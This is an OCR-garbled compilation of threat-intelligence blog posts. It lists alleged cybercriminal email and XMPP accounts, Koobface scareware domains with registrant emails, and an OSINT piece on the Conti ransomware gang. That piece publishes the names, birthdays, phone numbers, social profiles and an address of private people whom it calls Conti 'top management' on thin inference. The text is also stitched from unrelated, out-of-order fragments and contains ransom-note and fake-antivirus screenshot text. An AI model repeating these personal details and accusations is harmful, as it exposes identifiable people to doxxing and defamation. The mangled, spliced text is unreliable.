auFLYdV7L22eQH3PdqY j JdK8riwRYQHWBmQ6poTzHguNidbcb 
0. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhf yhMa0yuKBcHVo7SPCtzq7php3aGIHLxQtVr-DLTmC0Q 
11. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEhCwyBGwozh3BNdCaslItBhpGrt gwz41fqBigRamrG_N7P 
v6NzPU3eV3DhsycnUooSEDOK)3xPaH7rE1HfHNEQ6f_1gAVgNm4YSPR 


= HI 
FO c 
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12. 
13. 
14. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgDKfgBM- yqgBrn1wJO3MgxTgAgBxWx3IW8La3zMo- ZwE9 
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5,_ https: //blogger. googleusercontent .con/ing/b/R29vZ2x1/AVvksE kTxDLOx gZA u03unwqlnjJoqKCQLDEYF@CkHeiz5Ra 
6. _https://blogger. googleusercontent.con/ing/b/R29v22x1/AVwXsEht6dqXe6suSBRGZBnNBb m0 YOWOTEVHJUqDROO1FC2S 
7. https:/ blogger. googleuser content. con/ing/>/R29v22x1/AVWKsEh TeCTRtnl QevBHNI gor ouBgKi¥s_sVOREORScDAAI927 


Elo) rH 


— 


19.9.4 Who Wants to Chat Privately With Me? (2023-09-09 13:47) 


[1] 


Who wants to chat privately with me? I’m using OMEMO. My XMPP ID: 
ddanchev@conversations.im and this is my OTR danchodanchev@xmpp.jp 


— 


. https: //blogger.googleusercontent.com/img/a/AVvXsEj j 30feN_ZPHDCu16BQ67PX6i5XTNLHhAm12_rnuDrYJzY0g1GEA1pQy 
6aWlqz5U8D£R7MmY6b7ZjgyxBmg j 6cfxnIP40y6K1Mzyz303GPBvW 


19.9.5 My Projects (2023-09-11 18:44) 


[1] 


bit.ly /2h7XRU -> shunnarahamandla .blogspot.com 
bit.ly /3JZsDD -> derieuwsdarrius .blogspot.com 
bit.ly /3Zj98G -> schubachmarquis .blogspot.com 
bit.ly /lsXgRH -> nicnicmiralles .blogspot.com 

bit.ly /3eijza -> froneksaxxon .blogspot.com 

bit.ly /1I3rr7 -> attreechappy .blogspot.com 

bit.ly /2m3wP4 -> bilsboroughkebrom .blogspot.com 
bit.ly /30wcJn -> raheelanucci .blogspot.com 

bit.ly /2U7jYM -> orvelorvelblues .blogspot.com 
bit.ly /LCWOIZ -> kondrackinehemias .blogspot.com 
bit.ly /2m3wP4 -> bilsboroughkebrom .blogspot.com 
bit.ly /lqbXsi -> lizzamottymotty .blogspot.com 
bit.ly /79ONz -> rayvongonsalves .blogspot.com 
bit.ly /22Jyex -> klaartjebjorgvinsson .blogspot.com 
bit.ly /pO7jC -> humphriesteelateela .blogspot.com 


bit.ly /2IpZXx -> kalandraaleisha .blogspot.com 


The Blogspot accounts consist of a single post of automatically syndicated news item, 
which compared to previous campaign which relied on 25+ Koobface infected IPs directly 
embedded at Blogspot itself, this time relies on a single URL which attempts to connect to 
any of the Koobface infected IPS embedded on it. The currently active campaign redirects 
to rainbowlike cn/?pid=312s02 &sid=4db12f, which then redirects to [30]the scareware 
domain secure-your-files .com, with the sample phoning back to forbes-2009 .com/?b=1s1 
- 113.105.152.230, with another domain parked there activate-antivirus .com - Email: 
support@personal-solutions.com. 


Time to expose the entire portfolio of scareware domains pushed by the gang, and offer 
some historical OSINT data on their activities which were not publicly released until enough 
connections between multiple campaigns were established.Which ISPs are currently offering 
hosting services for the scareware domains portfolio [31]pushed by the [32]Koobface gang? 
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Aggregate Item Use Show stats for | all time ¥ | 


2010 2015 


Wednesday, December 14, 2005 — Saturday, September 14, 2019 


* 2,572,020 views of 1038 items 
| = 6,497,440 Clicks back to the site on 1217 items 


Dear blog readers, 

Got time? 

Check out some of my projects: 

- [2]STIX/STIX2 OpenCTI Threat Intelligence and loCs (Indicators of Compromise) Feed 
- [3]Cybercrime Maltego Graph Hacker Database v1.0 

- [4]Cybercrime Forum Data Set 2023 

- [5]Offensive Warfare 2.0 - Central Clearing House for Threat Intelligence 

- [6JOSINT Marketplace 


Stay tuned! 


1. https: //blogger . googleuser content . com/img/b/R29vZ2x1 /AVvKsEgPwcPVR-pSDcQEbVBmx 1-y4xVq0gVadD- 992Vp- sPsEFoGE 


2. 
3. 
4. https: //cybercrime-forum-dataset.org 
5. 
6. 


5 =) 
: 
SILEX 


ttps://offensive-warfare.com 


19.9.6 Sample Breach Forums Personally Identifiable Cybercriminal Email Address 
Accounts (2023-09-17 18:10) 


[1] 
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Databases 
® Official ® Databases Removed 
Content 


Stealer Logs 


® Stealer Log Removed Content 


Other Leaks 


® Other Leaks Removed Content 


Dear blog readers, 


The following is a personally identifiable email address compilation known to belong to known 
members of the Breach Forums cybercrime-friendly forum community which I’ve decided 
to share with the idea to assist researchers vendors and organizations including U.S Law 
Enforcement on its way to properly track down and monitor and prosecute the cybercriminals 
behind these campaigns. 


Sample personally identifiable email address accounts of known Breach Forums members 
include: 


bfweep[.]proton.me 
elforumadept[.]proton.me 
mybbjunkxd[.]protonmail.com 
cry4mebb[.]proton.me 
nathavm[.]proton.me 
opsopsops123[.]proton.me 
kokotc[.]proton.me 


meowza.mlplove[.]proton.me 
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megadabbz[.]protonmail.com 
rhapsody3[.]proton.me 
mixoleetou51[.]protonmail.com 
X153[.]protonmail.com 
cooncooncooncooncooncooncoon[.]proton.me 
drugsarefree[.]protonmail.com 
ciphergold[.]proton.me 
unknownUser23[.]protonmail.com 
Mafiosoyouth[.]proton.me 
domainreportaa[.]protonmail.com 
entrymeowmeow|[.]proton.me 
nicetryniggerkek[.]protonmail.com 
anOn.priv[.]proton.me 
COrpix[.]protonmail.com 
spumoni529[.]proton.me 
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wttr[.]protonmail.com 
darvinsass[.]proton.me 
whoisevensky[.]proton.me 


rokk37[.]proton.me 
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edccvb[.]proton.me 
asriux9935[.]proton.me 
idktpure[.]proton.me 
sneek28[.]proton.me 
fu58fj4[.]proton.me 
Pashata89[.]proton.me 
Related personally identifiable email address accounts of Breach Forums members: 
weej[.]tuta.io 

jigsaw11[. ]tutanota.com 
walter _brian[.]tutanota.com 
priestituta[.]gmail.com 
mufy[.]tuta.io 
karamellakto[.]tutanota.com 
blarg[.]tuta.io 

Forsaken87[. ]tutanota.com 
ratbag[.]tutanota.com 
wwewes[. ]tutanota.com 
dude6969[. ]tutanota.com 
chasethedragon69[.]tutanota.com 
breachforumsttiyshn[. ]tutanota.com 
4wayswing[.]tuta.io 
frederick832[.]tutanota.com 
vinnyannoyia[.]tutanota.com 
zeropio[.]tutanota.com 
bitchy[.]tuta.io 
robowhiz[.]tutanota.com 
z_ghent[.]tutanota.com 
wavie[.]tuta.io 
raping[.]tuta.io 
sneakypete33[.]tutanota.com 
Ernieball[.]tutanota.com 
masterdata[.]tutanota.com 
ax1I[.]tutanota.com 
ramb002[.]tutanota.com 
bytemafia[. ]tuta.io 
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xerosest[. ]tuta.io 
bashed[.]tuta.io 
asnegejusotutaip[.]gmail.com 
thotiana24[.]tutanota.com 
kala420[. ]tutanota.com 
tbackflower[.]tutanota.com 
yohankoshy|[.]tutanota.com 
sashahalas[. ]tutanota.com 
keeferga[.]tutanota.com 
BourbonCream1995[. ]tutanota.com 
progon|[.]tuta.io 

stuxnot[. ]tutanota.com 
cloudknight86[.]tutanota.com 
4e4enecal[.]tuta.io 
dealxtreme[.]tutanota.com 
tejo[.]tuta.io 
jstarq2[.]tutanota.com 


qazrfvujm[. ]tutanota.com 


3660vu9qbgq0wss78vt25402[.]tutanota.com 


M3t4w0rm32[.]tutanota.com 
browingmark[.]tutanota.com 
whitewalker777[.]tutanota.com 
woyaohuifuzhanghao[. ]tuta.io 
bjoshua[. Jtuta.io 
kstop7[.]tutanota.com 
bayganyo[.]tutanota.com 
hashcats[. ]tuta.io 
8urp420[.]tutanota.com 
krumi[. ]tutanota.com 

xcist[. ]tutanota.com 
fbii[.]tuta.io 
bfjohn[.]tutanota.com 

Euclid [.]tuta.io 
ppxpl[.]tuta.io 
kittypot[.]tutanota.com 
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Related personally identifiable email address accounts of Breach Forums members include: 
deaddd[.]dnmx.org 
squir[.]dnmx.org 
criox[.]dnmx.org 
jasafy842[.]Jdnmx.org 
nulettoo[.]Jdnmx.org 
talecyte[.]Jdnmx.org 
shagneto[.]dnmx.org 
c4tsya[.]dnmx.org 
randomlygenerated[.]dnmx.org 
gj49ndsOdv1[.]dnmx.org 
federalcat[.]dnmx.org 
vincegiligan[.]dnmx.org 
naisyaputridharma[.]dnmx.org 
builder[.]dnmx.org 
sz[.]Jdnmx.org 
breachforums23[.]dnmx.org 
r0318932[.]dnmx.org 
backagain[.]dnmx.org 
cFb9rShFu5ZB[.]dnmx.org 
lordisha[.]dnmx.org 
kangarootc[.]dnmx.org 
xnico[.]dnmx.org 
brettjs[.]Jdnmx.org 
doctorreal[.]dnmx.org 
sicarius69[.]dnmx.org 
akarca[.]dnmx.org 
hellokitty234891[.]dnmx.org 
TkIlmaster[.]dnmx.org 
Tarepanda[.]dnmx.org 
Indishell[.]Jdnmx.org 
redux[.]dnmx.org 
install[.]dnmx.org 
metasnapchat[.]dnmx.org 
Metaforce[.]dnmx.org 
28140 


Ahmadxd[.]dnmx.org 
Denisovich[.]dnmx.org 
Rilakkumabear[.]dnmx.org 
Jerrytom[.]dnmx.org 
Roundearth[.]dnmx.org 
Knight[.]dnmx.org 
RoyalQueen[.]Jdnmx.org 
Royalx[.]dnmx.org 
Soulx[.]dnmx.org 
DarknessX[.]dnmx.org 
Ak47x[.]dnmx.org 
Americax[.]dnmx.org 
Crackedx[.]dnmx.org 
123xd[.]dnmx.org 
Cobrax[.]dnmx.org 
Venomx[.]dnmx.org 
deathxd[.]dnmx.org 
Attrs[.]Jdnmx.org 
DarkxDeath[.]dnmx.org 
DarkxKnight[.]dnmx.org 
Evilx[.]dnmx.org 
Hiccup[.]dnmx.org 
Maleficent[.]dnmx.org 
MiaK[.]dnmx.org 
TopxG[.]Jdnmx.org 
LuciferD[.]dnmx.org 
shirokun[.]dnmx.org 
Crackx[.]dnmx.org 
DarkAli[.Jdnmx.org 
OnnichanUwU[.]dnmx.org 
karatekid[.]dnmx.org 
KhanB[.]dnmx.org 
iame[.]dnmx.org 
smartelog[.]dnmx.org 


audiencele[.]dnmx.org 
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iw991Lia[.]Jdnmx.org 
damemphis[.]dnmx.org 
GoogleX[.]dnmx.org 
IBM[.]Jdnmx.org 
breachedvc[.]dnmx.org 
MicrosoftPVT[.]dnmx.org 
FRS[.]Jdnmx.org 
GunX[.]dnmx.org 
KID[.]Jdnmx.org 
Toothless[.]dnmx.org 
TEN[.]dnmx.org 
CoinX[.]dnmx.org 
Demonxd[.]dnmx.org 
Asadx[.]dnmx.org 
VxPN[.]Jdnmx.org 
MetaFacebook[.]dnmx.org 
DOGx[.]dnmx.org 
GrandTheftAuto[.]dnmx.org 
Kingxpin[.]Jdnmx.org 
TigerXd[.]dnmx.org 
LostX[.]dnmx.org 
Bing[.]Jdnmx.org 
DiscordPVT[.]dnmx.org 
YouTubePVT[.]dnmx.org 
CID[.]dnmx.org 
TheUFO[.]dnmx.org 
DeadWarrior[.]dnmx.org 
DeathWAR[.]dnmx.org 
kilink[.]dnmx.org 
alabmoah[.]dnmx.org 
dejvbweiojdvbjwbid[.]dnmx.org 
PoliceDepartment[.]dnmx.org 
KingLEO[.]dnmx.org 
KhanG[.]dnmx.org 
MrBeastYT[.]dnmx.org 
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webviruscheck-4 .com 


webviruscheck5 .com 


Let us further expand the portfolio by listing the newly introduced scareware domains at 
[38]91.212.107.103, which was first mentioned in part one of the [39]Koobface Botnet’s 
Scareware Business Model as a centralized hosting location for the gang’s portfolio. 


and 


You are perched antes tor 6.95 Tres 
Sakeeaue aerate 


‘Your statement wil be under he name of Nedrancsea com 


Hbarbthercnpadnden ey tikerrinpereye 
* Fraud wil be prosecuted to he tutes! exter of he tw 


Scareware domains parked at 91.212.107.103: 
g-antivirus .com - Email: mhbilate@gmail.com 


generalantivirus com - Email: compalso@gmail.com 
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SuSAf[.]Jdnmx.org 
Man[.]dnmx.org 
ImMKSZ[.]Jdnmx.org 
Mojang[.]dnmx.org 
TeslaX[.]dnmx.org 
HailHydra[.]dnmx.org 
Eboy[.]dnmx.org 
EboyAli[.]dnmx.org 
NeganSmith[.]dnmx.org 
REDS[.]dnmx.org 
TheWalker[.]dnmx.org 
PTI[.]dnmx.org 
YukariX[.]dnmx.org 
AssWipe[.]dnmx.org 
Fury[.]dnmx.org 
She[.]dnmx.org 
Evex[.]dnmx.org 
VEX[.]dnmx.org 
BreachVC[.]dnmx.org 
0293848811[.]dnmx.org 
Assassin[.]dnmx.org 
Ezio[.]dnmx.org 
UnitedStates[.]dnmx.org 
Asian[.]dnmx.org 
Asiax[.]dnmx.org 
Mammal[.]Jdnmx.org 
RexT[.]dnmx.org 
Avoslocker[.]dnmx.org 
Rhino[.]dnmx.org 
tz002mail[.]Jdnmx.org 
Pythx[.]Jdnmx.org 
xBoss[.]dnmx.org 
mouly[.]dnmx.org 
Mailmx[.]dnmx.org 


CyberD[.]dnmx.org 
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MailG[.]dnmx.org 
NixOS[.]dnmx.org 
ShinyHunter[.]dnmx.org 
cap[.]dnmx.org 
Swordx[.]dnmx.org 
egirl[.Jdnmx.org 
ThelSIS[.]Jdnmx.org 
TheBible[.]dnmx.org 
TheVirus[.]dnmx.org 
Shoutbox[.]dnmx.org 
Force0O[.]dnmx.org 
babylOn[.]Jdnmx.org 
Thorodinson[.]dnmx.org 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgF fh8bHP83e1ik8kzJJZHeE1FT7P9mHf BZ3FCRr04MmkFw 
X1Uk5Bs _TKQ96Y3FoInSBnC JQCxKX8HhNI guAzyJFctXxfpZwJrjTY. 


19.9.7 Sample Personally Identifiable Cybercriminal XMPP/Jabber Accounts 
(2023-09-17 18:10) 


@@ 


[1] 
Dear blog readers, 


The following compilation of XMPP/Jabber account IDs known to belong to cybercriminals which 
| obtained using public and proprietary sources including data mining aims to assist researchers 
vendors and organizations including U.S Law Enforcement on its way to properly track down 
and monitor including to prosecute the cybercriminals behind these campaigns. 


Sample XMPP/Jabber accounts IDs known to belong to cybercriminals and known to have been 
involved in various campaigns include: 


newjabber@jabbim.com 
cash@allinione.com 
slark@jix.im 
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sypress@wwh.so 
soft-rdp@xmpp.jp 
merchant. official@xabber.de 
merchant.official@jabbim.com 
driesdtt@in.koderoot.net 
npaplavO00k@strong.pm 
npaplavO0OOk@xmpp.jp 
cashsir@xmpp.jp 
luke@allinione.com 
nsky@allinione.com 
adm@allinione.com 
mrgreen@allinione.com 
tech@jabber.belnet.be 
jsminamr@openmailbox.org 
mrlapis@exploit.im 
airman@jabber.ru 
neshpiter@jabbim.com 
joke@blah.im 
westup@codingteam.net 
big@myempire.me 
Z@allinione.com 
cuclusclan@allinione.com 
mrgr@im.osmose-am.net 
maracana777@exploit.im 
daydate@im.apinc.org 
scratch@jabber.belnet.be 
cubon@thesecure. biz 
mate@creep.im 
nauthstuff@exploit.im 
dozer@jabb.im 
luke@suchat.org 
mainqmac@jabber.cz 
nadmin@pro-fi.net 
nspacetex@jabber.cz 


supp01@jabberx. biz 
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suppO8@xmpp.jp 
supp17@exploit.im 
supp37@cock.li 
puusycat@jabber.ru 
info@albfrrame.com 
nsupport _miloff@exploit.im 
nmilanol@default.rs 
aizoo-adv@thesecure. biz 
tmtforlifeqazbey@xmpp.jp 
greenman@jabber.belnet.be 
mikluchamaklai@jabb.im 


chromehearts@jabber.ru 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEivEP_yNCd8SV4chFiw8alIS-8ZY7JJn_57hmMrYWT290B9 
otCf-qeISAfyodfXkRIpaQjYa95smyzQJ£TE1JQQoxXTD8xrluYcyf 


19.9.8 Sample Personally Identifiable XMPP/Jabber Accounts of the Gozi/Ursnif Mal- 
ware Gang Team Members (2023-09-17 18:10) 


@@ 


[1] 


Digging a little bit deeper into my ongoing research into various personally identifiable infor- 
mation such as for instance email address accounts and XMPP/Jabber account IDs belonging 
to cybercriminals I’ve decided to share a compilation of XMPP/Jabber account IDs known to 
belong to the Gozi/Ursnif malware gang team members with the idea to assist researchers 
vendors and organizations including U.S Law Enforcement on its way to properly track down 
monitor and prosecute the cybercriminals behind these campaigns. 


Sample XMPP/Jabber account IDs known to have been involved in the campaign include: 
newjabber@jabbim.com 

cash@allinione.com 

Slark@jix.im 

sypress@wwh.so 

28146 


soft-rdp@xmpp.jp 
merchant. official@xabber.de 
merchant. official@jabbim.com 
driesdtt@in.koderoot.net 
npaplavO00k@strong.pm 
npaplavO0OOk@xmpp.jp 
cashsir@xmpp.jp 
luke@allinione.com 
nsky@allinione.com 
adm@allinione.com 
mrgreen@allinione.com 
tech@jabber.belnet.be 
jsminamr@openmailbox.org 
mrlapis@exploit.im 
airman@jabber.ru 
neshpiter@jabbim.com 
joke@blah.im 
westup@codingteam.net 
big@myempire.me 
Z@allinione.com 
cuclusclan@allinione.com 
mrgr@im.osmose-am.net 
maracana777@exploit.im 
daydate@im.apinc.org 
scratch@jabber.belnet.be 
cubon@thesecure. biz 
mate@creep.im 
nauthstuff@exploit.im 
dozer@jabb.im 
luke@suchat.org 
mainqmac@jabber.cz 
nadmin@pro-fi.net 
nspacetex@jabber.cz 
supp01@jabberx. biz 
suppO8@xmpp.jp 
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supp17@exploit.im 
supp37@cock.li 
puusycat@jabber.ru 
info@albfrrame.com 
nsupport _miloff@exploit.im 
nmilanol@default.rs 
aizoo-adv@thesecure. biz 
tmtforlifeqazbey@xmpp.jp 
greenman@jabber.belnet.be 
mikluchamaklai@jabb.im 


chromehearts@jabber.ru 


1. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEhC4XKXNpzOf I9F- jGqMjO006TStm79t o6M3BYrnDVEPc_Uh 


9JcKVHJfyPz1likgQX-rcx6Uy1wboBPbTZmx41YrVNgvbxyTcYrxCI 


19.9.9 OSINT Round-Up- of  Russia-Based  High-Profile §Cybercriminals 
(2023-09-18 12:17) 


(11 ee.” ad 


In my line of work in specific when doing research and analysis | always stick to a common 
concept which has to do with the fact that “everything that can be found has already been 
found somewhere online”. Sticking to this basic methodology the only thing an individual ora 
researcher has to do is to look up the facts including all the relevant and necessary technical 
information on the individual or case they’re working on and basically come up with a proper 
analysis relying on publicly obtainable and publicly accessible information on their topic of 
interest. 


In this rather long OSINT analysis article I’ll do a OSINT roundup of Russia-based high-profile 
ransomware cybercriminals with the idea to share my research and analysis on the topic and 
potentially assist other researchers and vendors including U.S Law Enforcement on its way to 
properly track down and monitor and prosecute these cybercriminals. 
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www. sendspace.com/file/pxhBau\nhttps 
www, sendspace. com/delete/yxhbau/444f0b8a7b992a63765 
www. sendspace. com/file/c5z9oc\nhttps 
www. sendspace. com/delete/chz9o0c/5d625fa5aae08fbcaab 
www. sendspace.com/file/S9r0280\nhttps 
www, sendspace. com/delete/910280/9291 a83ababd44586ce 
wiwiw. sendspace. com/file/ly2jr5\nhttps 
www. sendspace. com/delete/ly2jr5/Oca6b385684c95a1 8366 
www. sendspace. com/file/ekkhjr\nhttps 
wy. sendspace. com/delete/ekkhyr/c? cb] di6ef9960227 755 
wy. sendspace. com/file/ihkxpi\nhttps 

[2] www.sendspace. com/delete/ihkxpi/34be372eb03961 cadd?: 


\I’ll begin this analysis with an emphasis and actual OSINT research and analysis on the Conti 
Ransomware Group in the context of demonstrating what real-time OSINT is which a pretty 
good and decent methodology that I’ve been relying and using over the years which works. 


It all began with an internally leaked and made publicly accessible Conti Ransomware Gang’s 
internal communication where a security researcher or a set of security researchers appear to 
have compromised their internal server and have been collecting conversation logs between 
the cybercriminals which they later on made publicly accessible on Twitter in a specific for the 
purpose account that basically included direct download links to their internal communication. 


From an OSINT perspective the first thing a researcher should do is to do their best to obtain 
access to these conversation logs and attempt to preserve them for current and future use 
which is something that | did almost immediately considering the possibility to monitor and 
track down who the actual individuals behind this massive ransomware campaign are. 


The results? I’ve managed to successfully identify some of key individuals behind the Conti 
Ransomware Gang in terms of top management where my believe is that although it was a hired 
or outsourced “know-how” in the beginning quickly matured into a cybercrime enterprise where 
everyone who wanted to could join on a “franchise” based model and just do their work and 
earn fraudulently and maliciously obtained revenue from legitimate companies who are having 
their networks compromised and sensitive data and information made publicly accessible or 
basically encrypted in a way making it impossible for the actual organization and company to 
use. 


What is the Conti ransomware gang up to in terms of top management? It appears that the 
gang’s top management in a way is involved in the fashion industry with the idea that some 
of the screenshots that | obtained and processed and analyzed which were leaked internally in 
the form of exchange of URLs between the gang’s members lead me to believe that the gang 
is involved in either investing in fashion brands or actually working on such with several suc- 
cessful public OSINT analyses on the topic where I’ve managed to identify some of the fashion 
brands behind the Conti Ransomware Gang’s top management and my goal here is to present 
the actual findings with the idea to bring this fact to more light in the context of providing 
information on the activity of the Conti Ransomware Gang’s top management members. 


[3] 
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[4] 
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[5] 
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[6] 
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general-antivirus .com - Email: abuse@domaincp.net.cn 
general-av .com - Email: mhbilate@gmail.com 
generalavs .com - Email: mhbilate@gmail.com 
gobackscan .com - Email: alcnafuch@gmail.com 
gobarscan .com - Email: jowimpee@gmail.com 
godeckscan .com - Email: quetotator@gmail.com 
godirscan .com - Email: momorule@gmail.com 
godoerscan .com - Email: geofishe@gmail.com 
goeachscan .com - Email: momorule@gmail.com 
goeasescan .com - Email: geofishe@gmail.com 
gofatescan .com - Email: alcnafuch@gmail.com 
gofowlscan .com - Email: stinfins@gmail.com 
gohandscan .com - Email: quetotator@gmail.com 
goherdscan .com - Email: jowimpee@gmail.com 
goironscan. com - Email: aloxier@gmail.com 
gojestscan. com - Email: jowimpee@gmail.com 
golimpscan. com - Email: stinfins@gmail.com 
golookscan. com - Email: stinfins@gmail.com 
gomendscan. com - Email: gleyersth@gmail.com 
gomutescan. com - Email: momorule@gmail.com 


gonamescan. com - Email: geofishe@gmail.com 


goneatscan .com - Email: momorule@gmail.com 
gopickscan. com - Email: momorule@gmail.com 


gorestscan. com - Email: quetotator@gmail.com 
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[7] 
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0S, 


LUXURY PROMOTIONS 


PASSIONATE ABOUT ELEGANCE 


FRAT 


[8] 
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So basically once | came across their internal leaked communication made publicly accessible 
on Twitter | immediately aimed to obtain access to the leaked internal information of the Conti 
ransomware gang and preserve it before it goes online so that I can later on work with it and 
successfully produce the analysis including all the screenshots managed and operated by the 
Conti ransomware gang and here’s how | did it. 


Basically once | obtained access to their internal leaked communication which was made pub- 
licly accessible | data mined the internal leaked communication looking for personally identi- 
fiable email address accounts and related URLs with success which is where | automatically 
visited these URLs which | data mined in the Conti ransomware gang’s internal leaked commu- 
nication and basically grabbed all the live URLs information which is where the analysis and the 
screenshots including the actual report come from which | produced and have been working 
on to produce exclusively for fellow researchers and vendors including U.S Law Enforcement 
in order to assist everyone on their way to properly track down monitor and prosecute. 


Sample Internally Leaked URLs Courtesy of the Conti Ransomware Gang Obtained Using Public 
Sources 


There are several other fashion brand themed screenshots which | also managed to obtain 
which appear to be directly related to the Conti ransomware gang. 


Here are some of the “upcoming brands” courtesy of the Conti Ransomware Gang obtained 
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using real-time OSINT and relying on their internally leaked communications proving the gang 
including its top management is into fashion brands and the industry: 


Here’s some personally identifiable information on some of the brands using OSINT and public 
sources of information: 


[9] 


Leylo 


Top Management Includes: 


tel:+79126331303 


[10] 
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Mapua CepreesHa Epmonaesa/Maria Ermolaeva (Chudnova) 
Birthday: 5 July 

hxxp://vk.com/id7326657 

Maria Ermolaeva 

Birthday: 5 July 

r. Ekatepun6ypr, yn. Penuna, 95, ocbuc 116 

Tenemou: +7 (912) 633-13-03 

E-mail: info@leylo.ru 

leyloekb@gmail.com 


hxxp://leylo.ru/ 


[11] 
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Danil Ermolaev 


hxxp://vk.com/id4874860 


Birthday: 7 August 1989 


Sample Top Management Photos and Personally Identifiable Information of the Conti Ran- 
somware Gang’s charity fund: 


[12] 
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Tamila Kerimova 

Conti Ransomware Gang’s Top Management Team 

hxxp://impulse-life.ru 

Tamila Kerimova 

— Birthday: 4 April 1986 

— hxxp://vk.com/id6515862 

— Planet for beauty and development 

— hxxp://irinaverhusha.com 

Ten: +7 926 536-63-68 

Email: impulse.life2020@gmail.com 

Sample Internally Leaked Screenshots Courtesy of the Conti Ransomware Gang: 
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Sample Conti Ransomware Gang’s Internal Leaked Screenshots 


Sample Related Internally Leaked Screenshots Courtesy of the Conti Ransomware Gang: 


Sample Conti Ransomware Gang’s Internal Leaked Screenshots 


[13] 


[14] 
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[16] 


[17] 
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goroomscan. com - Email: gleyersth@gmail.com 
gosakescan. com - Email: stinfins@gmail.com 
goscanadd. com - Email: momorule@gmail.com 
goscanback .com - Email: alcnafuch@gmail.com 
goscanbar .com - Email: jowimpee@gmail.com 
goscancode .com - Email: geofishe@gmail.com 
goscandeck. com - Email: geofishe@gmail.com 
goscandir. com - Email: crschuma@gmail.com 
goscandoer .com - Email: crschuma@gmail.com 
goscanease. com - Email: crschuma@gmail.com 
goscanfowl. com - Email: stinfins@gmail.com 
goscanhand. com - Email: quetotator@gmail.com 
goscanherd. com - Email: jowimpee@gmail.com 
goscanjest. com - Email: jowimpee@gmail.com 
goscanlike. com - Email: geofishe@gmail.com 
goscanlimp. com - Email: stinfins@gmail.com 
goscanmend .com - Email: gleyersth@gmail.com 
goscanname. com - Email: crschuma@gmail.com 
goscanneat .com - Email: crschuma@gmail.com 


goscanpick. com - Email: crschuma@gmail.com 


goscanref. com - Email: quetotator@gmail.com 
goscanrest .com - Email: quetotator@gmail.com 
goscanroom .com - Email: gleyersth@gmail.com 


goscansake. com - Email: stinfins@gmail.com 
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[20] 


28164 


[21] 
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Sample Conti Ransomware Gang’s Internal Leaked XMPP/Jabber Account IDs: 


LiamNeeson@jabber.ru 
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arb _reserved@ubuntu-jabber.de 
battletoad@jabbim.sk 
begemot sun@jabber.ru 
crazy digger@jabber.ru 
gfh6776@jabb.im 
ivanalert@jabber.ru 
landslide@jabb.im 

new _henry@jabber.cz 
scopehope@jabb.im 
ugly@1ljabber.com 
valerius2k@jabber.ru 
vdx17@jabber.ru 
337788@exploit.im 
asteradminn@sure.im 
benalen@exploit.im 
bio@yax.im 
crunch@exploit.im 
daiverjm@exploit.im 
dmanager@exploit.im 
fuckUSAhahaha@exploit.im 
fuckusa@exploit.im 
gfh6776@jabb.im 
goldcoin@exploit.im 
jackiedugn@exploit.im 
landslide@jabb.im 
martiniden123@exploit.im 
mr _loki@exploit.im 

posi tron@exploit.im 
pravdazanami@exploit.im 
rob0660@conversations.im 
scopehope@jabb.im 
soulst@exploit.im 

time t@exploit.im 
trqa23rt@exploit.im 


volhvb@exploit.im 


28167 


yastreb@exploit.im 
SamCodeSign@xmpp.jp 
alieelu@xmpp.jp 
baton@xmpp.jp 
batono@xmpp.jp 
benalien@xmpp.jp 
cosm123@xmpp.jp 
graddds@xmpp.jp 
guliver@xmpp.sh 
liamliam@xmpp.jp 


ohmygod728@xmpp.jp 
[23] 
AV XW Berenson meme) Bier Gunes 
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Your network has been infected by Avaddon 


- What's the matter? 


Your computer has been infected with 
Avaddon Ransomwere. All your files have 
been encrypted and you are not able to to 
decrypt it by yourself. To decrypt your files 
you have to bay Avaddon Decryptor 


- What can i do to 
get my files back ? 


You should buy your software Avaddon 
Decryptor. It will scan your PC, network 
share, all connected devices and check for 
encrypted and decrypt it. Current price: 
1000 USD. We accept cryprocurrency 
Bitcoin 


-What guarantees 
can you give me ? 


To be sure we have the decryptor and it 
works you use free decrypt and decrypt 
one file for free. But this file must be an 
image .because images usually are not 
valuable 


28168 


VPA B NIOGOM MECTE 
6 MOBOE BPEMA 


SHAKOMbCA, 
NPORBAAK CUMNATHIO 
CMYDECHBIMM NOQAPKAMHK 
AS-6ONbWONM KOSINEKUNK 


of 


x 


\ 


OKYHMCb B ATMOC@EPY 
VCTMHHOTO NIAC-BEFACA 
C HAWMMMK MAHK-WTPA 
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CNMCOK YXAXKMBAHMH 


30@ 


KOMMEHTAPHM 


@) BBEAMTE COOBLIEHME... @Q 
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~ P- 
nony4uan BbIZENMCh 
X10 ONDBITA 


MIrPAM 5E3 
CPEAM APY3ER 


PEKJIAMbI 


NOAYYAUTE B X10 BOWE OMBITA, KOFAA BbI 
HAXOAMTECb HA YPOBHE, 3AKAHUMBAIOLIEMCA HA 0 
(HAMPMMEP, 10, 20, 30 .. 150 1 TAK AAMIEE) M X2 PASA 
BO/bUWE ONbITA, KOTAA BbI HAXOAMTECb HA /IOBbIX 
APYTVX YPOBHAX B TEYEHME CPOKA AEMCTBMA 
BOHYCA.NONYYAATE B X10 BOMbUIE ONBITA, KOFAA BbI 
HAXOAMTECb HA YPOBHE, 3AKAHYMBAIOLUEMCA HA 0 
(HAMPMMEP, 10, 20, 30 .. 150 M TAK AAJIEE) VM X2 PASA 
BO/IbWE OMbITA, KOTAA BbI HAXOAMTEC HA JIOBbIX 
APYTMX YPOBHAX B TEYEHME CPOKA AEACTBMA 
BOHYCA.NO/YYAATE B X10 BOMbUE ONBITA, KOFAA BbI 
HAXOAMTECb HA YPOBHE, 3AKAHYMBAIOWIEMCA HA 0 
(HANPUMEP, 10, 20, 30 .. 150 M TAK MANE) M X2 PASA 
BO/bUE ONbITA, KOTAA Bbl HAXOAMTECb HA MIOBbIX 
APYTVX YPOBHAX B TEYEHME CPOKA AEMCTBMA 
BOHYCA. 
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LEVL 


HeTCKaA ODCXLa 


Denis Gennadievich Kulkov 


Personal Photo of Denis Gannadievich Kulkov 
28172 


goscanslip. com - Email: jowimpee@gmail.com 


goscansole .com - Email: crschuma@gmail.com 


7 = 
~ Protection leve 


Satety (ia * | Select application 


License error! 
Spyware scanner 


The license control center has 
detected an outdated or unknown 
software license. 


Surfing protection 


Database update error! a 


The database is out of date. Some 3 
components are not working - Cookies remover 


